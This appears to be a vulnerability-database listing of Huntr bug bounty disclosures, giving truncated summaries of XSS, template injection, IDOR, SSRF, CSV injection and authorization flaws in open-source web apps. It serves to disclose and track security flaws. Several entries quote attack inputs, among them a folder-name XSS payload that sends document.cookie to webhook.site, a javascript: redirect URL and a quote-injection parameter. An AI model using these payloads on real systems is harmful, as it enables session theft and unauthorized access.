
4072 matches found

Huntr
added 2023/06/15 4:56 p.m., 10 views

Stored XSS in the delete confirmation popup

Description: The product does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users. Proof of Concept: Step 1: The user with the privilege to create groups creates a new group by passing a payload into...

6.4 AI score
Exploits 0
Huntr
added 2023/06/15 4:44 p.m., 15 views

Server-Side Template Injection leads to Remote Code Execution

Description: Admin or Staff with "Mass mailer" permission can perform a Server-Side Template Injection attack. Proof of Concept: Log in as an admin or a staff member who has "Mass mailer" permission and edit a message. In the "Email content" field, insert the following value and click "Update and preview" %...

5.8 CVSS, 7.3 AI score, 0.01034 EPSS
Exploits 1
Huntr
added 2023/06/15 3:49 p.m., 7 views

Leak Secret tokens by changing baseURL

Description: nuxt-api-party allows developers to easily hook up APIs. You can configure API URLs and Credentials to be sent on requests. It is suggested in the documentation that this plugin is capable of handling sensitive data. There is a design flaw that could allow an attacker to extract priva...

6.7 AI score
Exploits 0
Huntr
added 2023/06/15 3:47 p.m., 8 views

Stored XSS on entire Client site

Description: Admin or Staff with "System" permission can produce a stored XSS on the entire Client site. Proof of Concept: Edit the "Signature" field to this value "FOSSBilling.org - Client Management, Invoice and Support Software"" Then it will trigger in every Client screen. Seems like it was rendered ...

6.2 AI score
Exploits 0
Huntr
added 2023/06/15 1:57 p.m., 9 views

The ability to edit groups owned by any user.

Description: The edit group function does not check the owner, allowing for the possibility to modify a group without being the owner of that group. Proof of Concept: Step 1: We have User1 who owns Group 1 and Group 2; User5 who owns Group 5. Step 2: User1 performs an edit group action and changes...

6.9 AI score
Exploits 0
Huntr
added 2023/06/15 1:14 p.m., 41 views

Desktop APP XSS to RCE

🔒️ Requirements: The user must load the malicious configuration and click on the buttons. 📝 Description: This exploitation relies on several issues which, chained together, lead to an RCE. In the following subsection, I will try to explain it as best I can. 💉 Not sanitized HTML injection: In the...

7.5 CVSS, 6.4 AI score, 0.0194 EPSS
Exploits 1
Huntr
added 2023/06/15 10:41 a.m., 6 views

Improper Authorization leads to privilege escalation

Description: The application improperly performs user authorization, resulting in a user with the user management role being able to modify their own permissions or those of others. Proof of Concept: Step 1: The highest-level administrator or an administrator with the permission to create roles...

6.7 AI score
Exploits 0
Huntr
added 2023/06/15 10:10 a.m., 7 views

Incorrect Authorization leads to delete user

Description: The application has incorrect permission settings, leading to a user with user administration rights being able to delete anyone, including users who are not under their management authority. Proof of Concept: Step 1: The User Demo super admin creates a user admin with user...

6.7 AI score
Exploits 0
Huntr
added 2023/06/14 8:40 p.m., 17 views

Session Fixation Vulnerability

Description: The application does not generate a new PHPSESSID cookie after the user authenticates successfully. A malicious user is able to create a new session cookie value and inject it into a victim pre-authentication. After the victim logs in, the injected cookie becomes valid, giving the...

5.8 CVSS, 6.7 AI score, 0.00506 EPSS
Exploits 1
Huntr
added 2023/06/14 6:28 p.m., 10 views

The user can delete himself

Description: Bypassing the conditional check allows the user to delete himself. Proof of Concept: Step 1: The user with id 18834 attempts to delete himself but encounters an error. Step 2: By using userid=18834' instead of userid=18834, the user was able to successfully delete himself...

6.9 AI score
Exploits 0
Huntr
added 2023/06/14 5:07 p.m., 10 views

Able to change username that is by default unchangeable

Description: The website receives input from the user that specifies multiple attributes, properties, or fields that are to be initialized or updated in an object, but it does not properly control which attributes can be modified. Proof of Concept: Step 1: We have a user with ID 18833 and the...

6.9 AI score
Exploits 0
Huntr
added 2023/06/14 1:51 a.m., 11 views

The app allows to set new password same as old password

Description: 1/ Access and log in to the demo website: https://demo.openitcockpit.io 2/ In the change password function, set the new password the same as the old password. 3/ Log out and log in again to check; it is successful. Proof of Concept: Link video PoC:...

7.1 AI score
Exploits 0
Huntr
added 2023/06/14 1:28 a.m., 21 views

Sensitive Cookie Without Secure Flag

Description: Access and log in to the demo website: https://demo.openitcockpit.io/ Press F12 on your keyboard or right-click on the website to open the dev tools. In the Application tab, choose Cookies; there are some sensitive cookies without the Secure flag: CookieAuth, csrfToken. Proof of Concept: Link imag...

4.9 CVSS, 6.8 AI score, 0.00261 EPSS
Exploits 1
Huntr
added 2023/06/14 1:20 a.m., 12 views

Sensitive Cookie Without HttpOnly Flag

Description: Access and log in to the demo website: https://demo.openitcockpit.io/ Press F12 on your keyboard or right-click on the website to open the dev tools. In the Application tab, choose Cookies; the sensitive CookieAuth cookie is set without the HttpOnly flag. Proof of Concept: Link image evidence:...

6.9 AI score
Exploits 0
Huntr
added 2023/06/13 9:33 a.m., 24 views

heap-buffer-overflow in function id3dmx_flush filters/reframe_mp3.c

Description: Heap-buffer-overflow in MP4Box. Version: MP4Box - GPAC version 2.3-DEV-revrelease (c) 2000-2023 Telecom Paris distributed under LGPL v2.1+ - http://gpac.io Please cite our work in your research: GPAC Filters: https://doi.org/10.1145/3339825.3394929 GPAC:...

1.7 CVSS, 6.9 AI score, 0.00398 EPSS
Exploits 1, References 1
Huntr
added 2023/06/12 8:34 p.m., 32 views

Desktop APP RCE via saveDraft IPC

🔒️ Requirements: The user must load a malicious project. 📝 Description: In version 20.3.3, commit 5383c20e947fd772668316e407edc5d5db4850db, the shell=true option is added to a spawn execution. This is really dangerous as it allows a malicious user to execute commands even from attributes. Example: j...

7.5 CVSS, 7.1 AI score, 0.01069 EPSS
Exploits 0
Huntr
added 2023/06/12 5:46 p.m., 15 views

XSS Filter Bypass in Folder Name leading to Information Disclosure

Description: Proof of Concept: First, log in to Teampass and go to the Folders tab. Create a new folder using Hex entities in the Label. In this case: scriptfetchhttpswebhooksitejlk documentcookiescript which is fetch'https://webhook.site/jlk/' + document.cookie Next, select the created folder and...

4.9 CVSS, 6.6 AI score, 0.00468 EPSS
Exploits 1, References 1
Huntr
added 2023/06/12 8:05 a.m., 27 views

Local file read through %load_json

Description: When ALLOW_PLANTUML_INCLUDE is set to false (the default setting in the online server), !include processing is turned off, preventing local files from being read. However, other features like %load_json can still access local files. Since many people will run plantuml-server in its defaul...

5 CVSS, 6.8 AI score, 0.00866 EPSS
Exploits 1
Huntr
added 2023/06/12 6:25 a.m., 17 views

URL Restriction Bypass

Description: In attempting to fix a previous issue, the PATTERN_USERINFO regular expression was changed. This change introduced another way to bypass the URL allowlist by introducing non-alphanumeric characters into the user information part of the URL. Proof of Concept: Run PlantUML with...

6.4 CVSS, 6.6 AI score, 0.0087 EPSS
Exploits 1
Huntr
added 2023/06/11 8:40 a.m., 17 views

IDOR in message deletion

Description: A user can delete others' messages. We know of the report https://huntr.dev/bounties/24ae402f-220f-41c6-962e-47c26938986e/ , but we found that one case was not fixed. Proof of Concept: 1 user1 sends admin a greeting card1 2 user2 sends admin a greeting card2 3 user1 deletes his message related ...

5.5 CVSS, 7 AI score, 0.00415 EPSS
Exploits 1
Huntr
added 2023/06/11 8:20 a.m., 17 views

Users can order Add-Ons Separately

Description: I found a requirement that addons must be purchased in conjunction with a product. However, a vulnerability has been discovered where an attacker can modify the product ID during the order process, allowing them to bypass the main product order requirement and directly purchase the...

3.5 CVSS, 6.8 AI score, 0.00476 EPSS
Exploits 1
Huntr
added 2023/06/10 5:31 p.m., 30 views

Directory listing in multiple endpoints

Description: Teampass has directory listing by default for various endpoints that eventually discloses application-specific and user data and files. Proof of Concept: Visit the following endpoints without logging in to the application. Sensitive - https://127.0.0.1/includes configs -...

5 CVSS, 6.7 AI score, 0.00704 EPSS
Exploits 1, References 1
Huntr
added 2023/06/10 5:05 p.m., 18 views

Stored XSS via Default session expiration time

Description: The Default session expiration time feature, when submitted with HTML/JS tags, executes the code in the login page. Proof of Concept: Log in to Teampass and go to Settings > Options. http://127.0.0.1/index.php?page=options In the Default session expiration time input field insert an XSS payload...

4.9 CVSS, 6.4 AI score, 0.00526 EPSS
Exploits 1, References 1
Huntr
added 2023/06/10 6:35 a.m., 22 views

Downloadable product type lacks order status check

Description: There is a vulnerability in fossbilling where upgrading non-active orders is prevented, but it is possible to still do so through the upgrade API...

5 CVSS, 6.8 AI score, 0.00407 EPSS
Exploits 1
Huntr
added 2023/06/09 11:33 p.m., 11 views

Privilege Escalation Vulnerability in Product Upgrade Module

Description: Our product upgrade module contained a privilege escalation vulnerability that would allow an unauthorized user to upgrade to a product they were not authorized to. After an administrator had configured that Product 1 can upgrade to Product 2, but not Product 3, a user could use Burpsuite to intercept...

7.1 AI score
Exploits 0
Huntr
added 2023/06/09 4:16 p.m., 17 views

Security vulnerability in product bundling feature

Description: Our e-commerce platform offers a bundled sales promotion feature, allowing an administrator to bind the sale of a product to an addon. However, we have identified a security vulnerability that exists in this feature. After an administrator cancels a bundle offer, users can still make...

3.5 CVSS, 6.8 AI score, 0.00407 EPSS
Exploits 1
Huntr
added 2023/06/09 9:00 a.m., 4 views

Serious Security Vulnerability Discovered in Promotion

Description: I am writing to report a serious security vulnerability that we have uncovered. Specifically, we have found that promotions applied to certain client groups are still being honored even after the promotions are no longer applicable to those groups. This means that attackers can...

7 AI score
Exploits 0
Huntr
added 2023/06/09 8:32 a.m., 18 views

we still can order the product even it is disabled

Description: I am writing to report a potential security vulnerability that was uncovered in your platform. Specifically, we discovered that your product purchase functionality can still be accessed via API even after the product has been disabled and is no longer available for sale. Proof of...

4 CVSS, 6.8 AI score, 0.00509 EPSS
Exploits 1
Huntr
added 2023/06/09 7:51 a.m., 14 views

Stored XSS in Survey Groups Function

Description: By injecting payloads into the Title and Description fields, users who visit the "Survey list" screen may be compromised. Proof of Concept: Step 1: Log in as Administrator, go to the "Survey list" screen, click the "create survey group" button. Step 2: Inject the payload into the fields...

6.9 AI score
Exploits 0
Huntr
added 2023/06/08 6:35 p.m., 14 views

Stored XSS vulnerability

Description: The product does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users. Proof of Concept 1: Step 1: The user has the right to access and perform the creation of surveys, with the payload...

6.8 AI score
Exploits 0
Huntr
added 2023/06/07 1:13 p.m., 45 views

Unauthenticated Blind SSRF

Description: The Oxeye research team found Owncast vulnerable to an Unauthenticated Blind SSRF vulnerability. This vulnerability may allow an unauthenticated attacker to force the Owncast server to send HTTP requests to arbitrary locations using the GET HTTP method. This vulnerability also allows...

6.4 CVSS, 7.5 AI score, 0.01356 EPSS
Exploits 1
Huntr
added 2023/06/07 7:33 a.m., 31 views

Open Redirect on follow/unfollow user's profile action

Description: The idea is similar to CVE-2022-1058 https://huntr.dev/bounties/4fb42144-ac70-4f76-a5e1-ef6b5e55dc0d/ . Browsers interpret \example.com as https://example.com, which leads to an open redirect. Proof of Concept: The vulnerable API lies in the follow/unfollow action on a user's profile. In order to...

3.6 CVSS, 6.8 AI score, 0.53177 EPSS
Exploits 2, References 1
Huntr
added 2023/06/06 3:44 p.m., 26 views

Formula Injection vulnerability in CSV export feature

Description: The admidio application is vulnerable to Formula Injection/CSV injection via the Firstname and Lastname input fields. These vulnerabilities allow unauthenticated attackers to execute arbitrary code via a crafted Excel file. Proof of Concept: 1. Create a member with role Associations boa...

4.4 CVSS, 8.3 AI score, 0.01679 EPSS
Exploits 4, References 4
Huntr
added 2023/06/06 9:29 a.m., 17 views

Stored XSS via file upload in FireFox

Description: Upload an html file containing an XSS payload. Payload ' On opening and refreshing the page, the XSS payload executes in Firefox. Proof of Concept: https://drive.google.com/file/d/1Irkg0u-8DcEizRSN3xE87ezEWmp0L4j/view?usp=sharing...

6.4 AI score
Exploits 0, References 1
Huntr
added 2023/06/06 6:51 a.m., 21 views

HTML Injection in Folder Name

Description: The folder name is not sanitized and, due to missing output encoding, HTML user input is rendered in the webpage during folder deletion. Proof of Concept: 1. Log in to Teampass as any user. 2. Go to the Folders tab. 3. Create a new folder with an HTML tag in the Label. Example: HTM...

4.9 CVSS, 6.9 AI score, 0.00522 EPSS
Exploits 1, References 1
Huntr
added 2023/06/05 8:52 a.m., 15 views

IDOR can make attackers add or close others' unavailable

Both user1 and user2 are Providers. 1 user1 logs in and adds an unavailable. 2 The request can be like POST /index.php/backend_api/ajax_save_unavailable HTTP/1.1...

4 CVSS, 7 AI score, 0.00374 EPSS
Exploits 1
Huntr
added 2023/06/05 6:07 a.m., 17 views

we can still send the photo as greeting card even the albums is locked

1 admin creates an album and uploads a photo 2 member-1 logs in and sends the photo as a greeting card to member-2 3 member-1 uses burpsuite to hijack the request, which can be like POST /adm_program/modules/ecards/ecard_send.php HTTP/1.1...

3.5 CVSS, 6.9 AI score, 0.00416 EPSS
Exploits 1
Huntr
added 2023/06/04 3:03 p.m., 23 views

Stored XSS in many configuration fields

Description: Paste the XSS payload into the configuration fields. And I think there are many fields to configure that can be vulnerable to Stored XSS vulnerabilities, such as configuration fields in Options, MFA, API, Emails,... hope you check it too. Proof of Concept:...

4.9 CVSS, 6.1 AI score, 0.00537 EPSS
Exploits 1, References 1
Huntr
added 2023/06/04 1:20 p.m., 18 views

Create multiple user with the same username (Race Condition)

Description: Administrator users can create multiple users with the same username, which breaks the logic of the web application. Proof of Concept: Step 1: At the Administration > User Management > Manager User screen, click on the "New Local User" button. Step 2: Fill in all the required fields, notice that the...

1.7 CVSS, 6.9 AI score, 0.00475 EPSS
Exploits 1
Huntr
added 2023/06/03 10:45 p.m., 12 views

HTML Injection / Possible XSS

Description: In pimcore I was able to identify an Unauthenticated HTML Injection / Possible XSS. Conditions: 2-factor authentication must not be set up before. Vulnerable Endpoint: http://localhost/admin/login/2fa-setup Vulnerable Param: error= How it works: So basically any admin who has not set up 2...

7.5 AI score
Exploits 0, References 1
Huntr
added 2023/06/03 8:39 p.m., 26 views

CSRF on /api/graphql query executing the mutations through GET requests

Description: Mutations are saveRecord or createProcess queries used in Graphql. SuiteCRM prevents CSRF in this functionality by sending a POST request with an X-Xsrf-Token header. The bug here is that, when we send a GET request, the backend does not expect the X-Xsrf-Token header. Using this, an...

6.8 CVSS, 6.9 AI score, 0.00302 EPSS
Exploits 1, References 3
Huntr
added 2023/06/02 4:05 p.m., 17 views

Stored XSS on user's name

Description: Paste the XSS payload into the Name or Last name field. The XSS vulnerability will trigger. Proof of Concept: https://drive.google.com/file/d/1hoZkCxzTQbcIDy28hKJyjyrOD1Pcaaz0/view?usp=sharing...

4.9 CVSS, 6.4 AI score, 0.00738 EPSS
Exploits 1, References 1
Huntr
added 2023/05/31 10:25 a.m., 21 views

The web app does not verify weak password at backend

Description: Access and log in to the demo website: https://cloudexplorer-lite-demo.fit2cloud.com/ In the change password function, the backend does not verify weak passwords, so that a user can: 1/ Set the new password the same as the old password. 2/ Set a new password of one character, such as 1. This case c...

6.5 CVSS, 7.1 AI score, 0.0078 EPSS
Exploits 1
Huntr
added 2023/05/30 9:10 a.m., 15 views

missing permission check for API /setting/workspace/member/update

Proof of Concept: 1 user1 is the workspace administrator of workspace1 2 user2 is a member of workspace1 3 user1 updates user2's information, for example updating them to workspace administrator 4 Use burpsuite to intercept the request POST /setting/workspace/member/update HTTP/1.1 Host: 192.168.213.128:8081 Content-Length: 144 Accept-Language: zh-CN WORKSPACE: bd6fc04b-15af-43dc-8cb6-411deaec81a7 User-Agent:...

6.5 CVSS, 7 AI score, 0.00589 EPSS
Exploits 1
Huntr
added 2023/05/30 3:24 a.m., 9 views

Stored XSS in End page

Description: Allows a user who only has the authority to create surveys, not the administrator, to bypass validation and embed javascript schemes when creating surveys. Steps to reproduce - Log in as administrator 1. Open User management and create a user with create surveys only permissions. 1. Logout...

6.9 AI score
Exploits 0
Huntr
added 2023/05/29 4:23 p.m., 24 views

OOB read from unchecked return

Environment: Distributor ID: Debian Description: Debian GNU/Linux bookworm/sid Version: I checked against the latest release as of 05/29/23, the current master branch at commit 4f810869b06b5d7b0cb73d166864dfb4b1e900f6 . Description: This AddressSanitizer output is indicating a read on an unknown...

3.2 CVSS, 6.9 AI score, 0.00306 EPSS
Exploits 1
Huntr
added 2023/05/29 9:35 a.m., 25 views

DOM Cross Site Scripting and openredirect

Vulnerable Endpoint: https://demo.saleor.io/default-channel/en-US/account/login/?next=javascript:alert1 Description: 1. Hello team, recently I found that on the saleor React storefront dashboard there is a DOM XSS and open-redirect vulnerability. Steps to reproduce XSS: 1. Go to the above mentioned...

5.8 CVSS, 6.3 AI score, 0.00459 EPSS
Exploits 1
Huntr
added 2023/05/29 7:08 a.m., 17 views

Cross-Site Scripting (Stored XSS)

Description: With the Association's board role, I can add a new web link. But when I create a link, in the Link name input field I can insert an onfocus/autofocus attribute because double quotes are not processed. Proof of Concept: 1. Log in with an account with the Association's board role 2. Access the function Web...

4.9 CVSS, 6.3 AI score, 0.00479 EPSS
Exploits 1
Huntr
added 2023/05/28 11:48 a.m., 15 views

Improper Authorization in "Customer automation rules" function

Description: The product performs authorization checks incorrectly when an unauthorized actor tries to access a resource or perform an action. Proof of Concept: The user does not have permission to delete the rule. Location - GET /admin/customermanagementframework/rules/list - POST...

6.4 CVSS, 6.7 AI score, 0.00444 EPSS
Exploits 1
Huntr
added 2023/05/27 3:26 p.m., 11 views

Integer Overflow in tjexample.c

Description: The tjexample.c example program uses the tjAlloc function to allocate the output buffer of the JPEG buffer. tjAlloc uses malloc, which takes a size_t number of bytes, an unsigned integer. However, tjAlloc itself takes the number of bytes as a signed integer:...

7.2 AI score
Exploits 0
Total number of security vulnerabilities: 4072